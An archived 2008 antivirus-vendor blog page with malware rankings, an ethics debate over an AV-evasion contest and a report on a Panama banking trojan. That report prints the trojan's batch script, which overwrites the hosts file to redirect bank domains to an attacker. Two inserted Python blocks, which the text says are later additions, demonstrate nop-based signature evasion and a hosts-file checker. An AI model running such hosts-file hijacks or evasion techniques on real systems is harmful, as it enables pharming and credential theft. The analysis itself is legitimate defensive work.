Analyst's Diary
Malware Miscellany, April 2008
Yury | May 07, 2008 | 13:02 GMT
- Greediest Trojan targeting banks
Trojan-Spy.Win32.Banker.lax, which targets customers of 104 banks, wins this category in April.
- Greediest Trojan targeting payment systems
Another variant of Banker, in this case Trojan-Spy.Win32.Banker.krv, takes the palm this month. It targets the users of three e-payment systems.
- Greediest malicious program targeting payment cards
April's winner in this category is Trojan-Spy.Win32.Bancos.blc, which has its sights set on three payment card systems at once.
- Stealthiest malicious program
This month, one variant of Backdoor.Win32.Hupigon.bqsi wins out, being packed with seven different packers.
- Smallest malicious program
The tiny Trojan.BAT.MouseDisable.b, at a mere 22 bytes, still manages to block the mouse once launched.
- Largest malicious program
April's winner is Trojan-Dropper.Win32.Agent.nrh – at 46MB in size, it's not that large compared to previous victors in this category.
- Most malicious program
There's a new entrant in this category – a modification of Backdoor.Win32.Agobot.gen replaces the Haradong family, which has ruled for the last two months. Malicious programs from this family search for and destroy antivirus solutions in all possible locations – in RAM, the system registry and on disk.
- Most common malicious program in email traffic
In a couple of months we may have to reconsider the value of this category, as it's been almost exclusively occupied by Email-Worm.Win32.Netsky.q. The worm isn't conceding ground to any other malicious program, and during the last month it even increased its share of infected mail traffic to 40.58%.
- Most common Trojan family
Backdoor.Win32.Hupigon remains the most 'fertile' malicious program, giving birth to 3151 modifications in the course of a single month – only slightly fewer than last month.
- Most common virus/worm family
Worm.Win32.AutoRun heads this category in April, with 230 new modifications.
More thoughts on drawing the line
VitalyK | April 30, 2008 | 16:17 GMT
Following on from Eugene's post, I'd like to chip in with my thoughts on what's happening at Defcon this year. I spoke at Defcon last year, and I'd say that the event is something unique – an opportunity for smart people with unconventional minds to meet and share their knowledge. Defcon not only gives you access to new ideas, but you also get to encounter the spirit of modern cyberculture. It seems to me that the emergence of contests like Race to Zero was always simply a matter of time. And now that such a contest has appeared we'll see similar ones in the future, whether we like it or not. Of course breaking the law is wrong - I think the exact form of the contest will be modified before Defcon starts in order to meet legal restrictions. However, I think the Race to Zero contest organizers could change the rules of the game in other ways, to make it beneficial to all participants. Let me explain...

Let's take a look at what the participants are going to manipulate: they will have the code of existing applications and probably some prepared sets of nop code. Nop code ("no operation" code) is special software code that neither affects the state of the machine nor alters the system. There are many approaches to obfuscation techniques but almost all of them have the same basic principle: the affected code is restructured and mixed with nop code. Depending on the algorithm used to mix the two sets of code, either it will be more difficult to read/re-engineer the code or the code will be able to evade detection by signature-based AV software engines. Of course, obfuscated code can cause headaches for AV companies. Because obfuscated code is slightly harder to analyse manually, it takes more resources to maintain a collection of obfuscated samples which do not differ from each other in terms of behaviour. If an obfuscated sample is analysed using automated tools, the analysis will take longer than that of a non-obfuscated sample.

Given this, AV companies work pretty hard on deobfuscation tools. There are two issues here: obfuscation and deobfuscation, which differ a bit in terms of complexity. Imagine you have a bucket of sugar and a bucket of sand. You can mix the contents of the two buckets together in different ways – and these different ways of mixing are like different obfuscation algorithms. The reverse is deobfuscation – separating the mixture of sugar and sand into its two component parts. Just take a minute to think about those two buckets – it's so quick and easy to mix the contents, but separating them is a long, tiring process!

In some sense, dealing with obfuscation algorithms and solving problems like making an application undetectable by AV software is easy – it's a white box issue. You have the source data as well as the AV software, and the chance to analyse the disassembled code, so you can develop and debug your own application to alter the data. You can see each part of the process and the mechanism you create. Deobfuscation, though, is completely different. You have a few pieces of code that have been transformed by obfuscation – and you don't have the application used to obfuscate the code. So deobfuscation doesn't even fit the black box model, where you usually have the opportunity to utilize a mechanism as many times as you like, although you can't see inside it in order to understand how it works. When you deal with deobfuscation you have only data that results from this mechanism; the data has to be studied in order to determine unique/common features, and then you have to draw your own conclusion on how the hypothetical black box actually works. In my opinion, deobfuscation requires greater imagination and skills than obfuscation.

I think if the organizers of Race to Zero keep the principles of ethical hacking firmly in mind, and extend the rules of the contest to include deobfuscation, it could be good fun, and a good experience for everyone involved.
Just to be very clear: examining the issues of obfuscation/ deobfuscation doesn't mean you have to create new malware or modify existing malware. It's simply not necessary. The contest isn't just a technical challenge, but a moral one as well. Let's hope that everyone makes the decision to be on the right side of the line so we can all reap the benefits.
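The sugar-and-sand point above in working code, as an added example that is not from the original post or from Kaspersky: an invented toy stack machine is "mixed" with semantic nops (the obfuscation side), and a normalizer that sees only the transformed bytes strips them again (the deobfuscation side), showing why a plain byte signature fails while a signature over the canonical form still matches. The instruction set, the nop patterns and the "known sample" are all constructed for the demo.

```python
import hashlib
import random

# Invented one-byte opcodes for a toy stack machine (constructed for this demo, not x86).
NOP, PUSH, POP, ADD, SWAP, RET = 0x00, 0x01, 0x02, 0x03, 0x04, 0x05
LENGTH = {NOP: 1, PUSH: 2, POP: 1, ADD: 1, SWAP: 1, RET: 1}  # opcode plus operand bytes
# Sequences that leave machine state untouched: the 'nop code' an obfuscator mixes in.
SEMANTIC_NOPS = [bytes([NOP]), bytes([SWAP, SWAP]), bytes([PUSH, 0x00, POP])]
# Constructed 'known sample': push 2, push 3, add, return.
ORIGINAL = bytes([PUSH, 2, PUSH, 3, ADD, RET])

def decode(code: bytes) -> list[bytes]:
    """Split a byte string into whole instructions (opcode plus operand bytes)."""
    insns, i = [], 0
    while i < len(code):
        n = LENGTH[code[i]]
        insns.append(code[i:i + n])
        i += n
    return insns

def obfuscate(code: bytes, seed: int) -> bytes:
    """Mix the sample with nop code (a random semantic nop before every instruction).
    Behaviour is unchanged, the bytes are not, so a byte signature stops matching."""
    rng = random.Random(seed)
    return b"".join(rng.choice(SEMANTIC_NOPS) + insn for insn in decode(code))

def normalize(code: bytes) -> bytes:
    """Deobfuscate from the transformed bytes alone, without the mixer: drop NOPs,
    then strip cancelling SWAP/SWAP and PUSH/POP pairs until nothing changes."""
    insns = [i for i in decode(code) if i[0] != NOP]
    changed = True
    while changed:
        changed, out, k = False, [], 0
        while k < len(insns):
            op = insns[k][0]
            nxt = insns[k + 1][0] if k + 1 < len(insns) else None
            if (op, nxt) in {(SWAP, SWAP), (PUSH, POP)}:
                k, changed = k + 2, True  # cancelling pair: remove both instructions
            else:
                out.append(insns[k])
                k += 1
        insns = out
    return b"".join(insns)

def matches_raw(sample: bytes, known: bytes) -> bool:
    """Plain byte-pattern signature: defeated as soon as nop code is mixed in."""
    return known in sample

def matches_normalized(sample: bytes, known: bytes) -> bool:
    """Signature over the canonical form: survives any mixing built from SEMANTIC_NOPS."""
    return hashlib.sha256(normalize(sample)).digest() == hashlib.sha256(normalize(known)).digest()

if __name__ == "__main__":
    for seed in (1, 2, 3):
        v = obfuscate(ORIGINAL, seed)
        print(v.hex(), matches_raw(v, ORIGINAL), matches_normalized(v, ORIGINAL))
```

The normalizer only knows the nop vocabulary, not which mixing order was used, which is exactly the "data without the mechanism" situation the post describes.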
Eugene | April 28, 2008 | 21:09 GMT
The so-called 'malware obfuscation contest' proposed by the folks at Race to Zero is already generating contradictory discussions. IMHO - either something is ethical or not...and I firmly hold that creating new malware to bypass security products 'for fun' is not! We anti-virus researchers have always opposed the creation of new malware under any circumstances. The only excuse for creating malware in test environments that ever sounded vaguely reasonable was the old "we need to create new samples in order to study attack methods in detail". Let's get real folks - we are seeing new samples by the thousands today - we have more than enough 'live' malware to study in order to improve our technologies. So even if this excuse was "sort-of-maybe one-time-only almost-acceptable" once upon a time, it is NOT acceptable in 2008.

The assertion that "signature-based antivirus is dead, people need to look to heuristic, statistical and behavior based techniques to identify emerging threats" is just a cheap publicity stunt. Nobody, but nobody in the AV industry depends only on signatures - we haven't for years. In fact, it sounds as if most (read all) AV scanners will fail the 'tests' in the 'contest' because it's easy to cheat signature-based scanners and static heuristics. This will send a clear message to thousands of e-criminals: "do more obfuscation". So, this 'contest' will only stimulate e-criminals to research and develop new obfuscation technologies. Since they are busy doing this anyway - they just will do it more and more. Thanks, but no thanks, virus labs don't need such stimulation - we have enough work as it is.

The most positive public responses are calling the contest a form of product testing. Wrong!! Antivirus testing, like any other product testing, must be done by trained professionals, for instance Andreas Clementi, Andreas Marx or Virus Bulletin, in a fair, ethical and scientific manner. This is how things work in a reputable industry.

The Race to Zero/DefCon 'contest' is:
- NOT done by professional testers - no comment
- NOT fair - no public contacts with AV vendors to date
- NOT scientific - the test bed is not delineated
- And, last, but not least, it is 100% NOT ethical! Writing malware is a crime. End of story.
Finally - what about the US Federal Computer Act?? And other legislation? Is this 'contest' even legal in the US? Is the agency responsible for monitoring e-crime aware of it? So, it all boils down to... should we have public and unstructured 'contests to test' criminal technologies run by uncertified/unproven people? What about a 'live robbing a bank contest' to test bank security systems? Or maybe a 'drugs distribution trial in a school' - to test the narcotics police? Anything can be taken to a ridiculous extreme - code analysis included. Let's all take a deep breath and focus on developing protection technologies, not 'modifying malcode for fun'.
Panama – a tempting target
Dmitry | April 21, 2008 | 12:37 GMT
We recently got back from Panama, where we took part in a conference on cyber crime in Latin America. Although Costa Rica is the country with the highest Internet penetration rate, Panama leads the rankings with the highest number of successful attacks. And what makes Panama such a tempting target? The flourishing economy and a free trade zone have led to a huge number of banks making their home in the country – and the successful attacks are attacks on banks. 
Our conference presentation highlighted that today's attacks are often highly local: they're tailored to a specific country, target a specific group within that country, and, as a rule, they don't spread beyond the bounds of the region or even the state. This is a tactic designed to extend the life cycle of the malicious programs used to conduct the attack - localized attacks minimize the risk of being detected by antivirus companies. Pretty much as soon as we got back from Panama one of these attacks broke out. Email users in the .pa domain were spammed with an email inviting them to pick up an e-card from the Latin American service Gusanito.com. When the user clicks the link, a file called 001002003.exe downloads to the victim machine and then carries out the following operations:

@echo off
title AVERSINODETECTA----------HAHAHAHAHAHAHAHAHAHAHA
del c:\WINDOWS\system32\drivers\etc\hosts
copy hosts c:\WINDOWS\system32\drivers\etc\hosts
echo 75.127.*.* www.bbvapanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* bbvapanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts
exit
echo > "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpfile0.tmp"

The malicious program adds IP records for the BBV Panama domains to the local hosts file. The 'title' field, which includes a phrase meaning 'They might not notice', indicates that the author is almost certainly Spanish speaking. If the victim of the attack is a client of the bank and tries to visit the bank's site, s/he will be automatically redirected to a fake site which is, as usual, an exact copy of the original site.
As I mentioned above, malicious users try and spread their creations within a limited area in order to evade detection by antivirus solutions for as long as possible. This case shows that the tactic does work, to some extent – three days after the attack, only 2 antivirus companies were detecting the malicious program. One of them was Kaspersky Anti-Virus, which detects the culprit behind this latest attack as Trojan.Win32.Qhost.alc.
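A defender-side check for the hosts-file hijack shown above, added here as example code (not Kaspersky's and not from the original post): it parses a hosts file and flags every mapping that does not point at the local machine, calling out the watched bank domains separately. The hosts content is constructed, the documentation address 203.0.113.7 stands in for the masked attacker IP, and the watch-list of domains is an assumption.

```python
import ipaddress

# Constructed hosts file: Windows defaults plus the four lines the batch file above appends.
# 203.0.113.7 is a documentation address standing in for the masked attacker IP.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.7 www.bbvapanama.com
203.0.113.7 bbvapanama.com
203.0.113.7 www.bbvanetpanama.com
203.0.113.7 bbvanetpanama.com
"""
# Assumed watch-list of sensitive domains; a real deployment would maintain its own.
WATCHED_DOMAINS = ("bbvapanama.com", "bbvanetpanama.com")

def parse_hosts(text: str) -> list[tuple[str, str]]:
    """Return (ip, hostname) pairs, dropping comments, blank lines and malformed lines."""
    pairs = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        pairs.extend((fields[0], host.lower().rstrip(".")) for host in fields[1:])
    return pairs

def is_local(ip: str) -> bool:
    """True for loopback/unspecified addresses, the only targets a clean hosts file needs."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # not an IP address at all; the caller will flag the entry
    return addr.is_loopback or addr.is_unspecified

def is_watched(host: str) -> bool:
    """Exact match or subdomain of a watched domain."""
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)

def suspicious_entries(text: str) -> list[tuple[str, str, str]]:
    """Flag (ip, host, reason) for every mapping that does not resolve to the local machine.
    A watched bank domain pointing elsewhere is the pharming pattern used by Qhost above."""
    findings = []
    for ip, host in parse_hosts(text):
        if is_local(ip):
            continue
        reason = "watched bank domain redirected" if is_watched(host) else "non-loopback mapping"
        findings.append((ip, host, reason))
    return findings

if __name__ == "__main__":
    for ip, host, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"{host:28} -> {ip:16} {reason}")
```

On a live machine, feed it the contents of %windir%\System32\drivers\etc\hosts instead of SAMPLE_HOSTS; any finding deserves a look, because a workstation's hosts file normally maps nothing but localhost.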
Aleks | April 18, 2008 | 15:49 GMT
There's been an update on the Trojan case we mentioned earlier this week – a 24-year-old has been sentenced to five and a half years for computer crime. He was found guilty under Section 1, Article 272 (unlawful access to legally protected computer data) and Section 4, Article 159 (gross fraud) of the Russian Federal Criminal Code and will serve out his sentence in a minimum-security correctional facility. The case stated that "between June and August 2007, the accused used a malicious program to get the secret key of a commercial organization and, in the name of the organization, traded futures on the commercial market." The losses totalled more than 1.3 million roubles. The young man, who admitted his guilt in court, transferred 1,000,000 of his ill-gotten roubles to a personal account which he opened with one of the local Yoshkar-Ola banks.
Aleks | April 16, 2008 | 14:33 GMT
Regular readers of this blog and our analytical articles may remember that in summer last year we wrote about a new variant of Bancos.aam designed to steal data from users of QUIK, a Russian Internet trading system. Russian reports on the ongoing investigation say the suspect, one Evgeny Simonov from Yoshkar-Ola, is currently not permitted to leave the city. He used the Trojan to steal a broker's log-in and password and then illegally made at least 2.5 million roubles (around a hundred thousand dollars) on fraudulent trades. 
Simonov clearly saw the opportunity to turn a quick buck. But he slipped up by making deals via his mobile: the investigators checked when the fraudulent deals were made, and the originating IP address, and traced Simonov via his mobile operator. The whole case raises an interesting point: new technologies and increased connectivity provide malware writers with increased opportunities, but the same technologies can also be used against them.
Eugene | April 14, 2008 | 17:11 GMT
Ah, numbers: there are simple numbers, magic numbers, lucky numbers and unlucky numbers. There are people who are scared of numbers, people who don't understand numbers, people who love numbers, and people who ignore numbers. Me...I love numbers and always pay attention to how they sound and taste. Yesterday some of us got on a flight to Boston from NYC. As the computer produced my boarding pass, I watched the numbers unfold and saw that this was a special day: number 13 was the name of the game.
- 13 - the date
- 13 - the flight number - with the 2 and 0 voided by the 20 in the gate number
- 13 - the boarding time
- AND 3 + A in hexadecimal is 3 + 10 = 13
Four 13s on one boarding pass!! Wow - I'm amazed I survived! How did I do it, you might ask if you happen to believe in the bad luck 13 brings? I don't know: maybe it was because the flight departed at 200P or APR 2008 = 14 if you add the digits in that line. And finally, it was my 14th flight of the year, not the 13th. So, I survived and I'm completing this US tour with a day in Boston. Flight number 15 of the year will be tomorrow and I'll be looking at new numbers.
Michael | April 10, 2008 | 20:01 GMT
It seems as if we can't turn around anymore without hearing about infected devices of all sorts. This week we've already seen HP admitting to shipping infected floppy/flash drives - see SANS Internet Storm Center for details. In the meantime, one of my co-workers went on vacation and treated herself to an MP3 player. She got home and plugged her new toy into a USB port in her PC and yes, you guessed it - it was infected. Fortunately she had KIS installed: On the one hand, we all enjoy using our smartphones, MP3 players, flash drives and so on. On the other hand, we can't ever be sure that our devices are clean. So protect those servers and laptops folks...'cause portable devices aren't going away anytime soon. Nor are they secure.
Malware Miscellany, March 2008
Yury | April 10, 2008 | 13:22 GMT
- Greediest malicious program targeting banks
As we move into spring, this category is taken by one modification of Trojan-Spy.Win32.Banker.zq, which targets 109 banks simultaneously – a huge rise on last month's Banker.cji, which targeted 44 banks.
- Greediest malicious program targeting payment systems
March's winner in this category is Trojan-Spy.Win32.Banker.etk, which has its sights set on a comparatively modest three payment systems.
- Greediest malicious program targeting payment cards
Another member of the Banker family, Trojan-Spy.Win32.Banker.enw takes the crown this month, targeting the users of four different payment systems at once.
- Stealthiest malicious program
If you're a regular reader of this column, you'll know that malware packed with ten different packers is nothing rare. And this month gives us yet another example: Trojan-Downloader.Win32.Delf.ain.
- Smallest malicious program
Get your magnifying glasses out for this month's winner – Trojan.BAT.FormatC.r, which weighs in at a mere 16 bytes but still manages to wipe your C: disk.
- Biggest malicious program
For the second month in a row this category is taken by a member of the Haradong family; in this case it's Trojan.Win32.Haradong.fj, which weighs in at 305MB, 79MB larger than last month's entrant.
- Most malicious program
With the transition to spring, the leader in this category has changed. March's winner is Backdoor.Win32.Rbot.gen, and given the nasty nature of the Rbot family, this comes as no surprise. The programs covered by this detection use a number of methods to disable a range of antivirus solutions.
- Most common malicious program in email traffic
No changes here this month – once again we've got Email-Worm.Win32.Netsky.q leading, making up 37.39% of all infected mail traffic, slightly up on last month's 36%.
- Most common Trojan family
March's winner is Backdoor.Win32.Hupigon – we detected a stunning 3381 modifications of this family in March!
- Most common virus/worm family
This category has something slightly new for March: Net-Worm.Win32.Kolab dominates this particular category with 35 modifications.
Malware Defence Workshop details
David | April 10, 2008 | 08:41 GMT
Following on from last Wednesday's post - if you're interested in attending our Malware Defence Workshop (which includes puzzles like the one shown above!), do contact us on malwaredefence [at] kasperskylab.co.uk and we'll send you a schedule.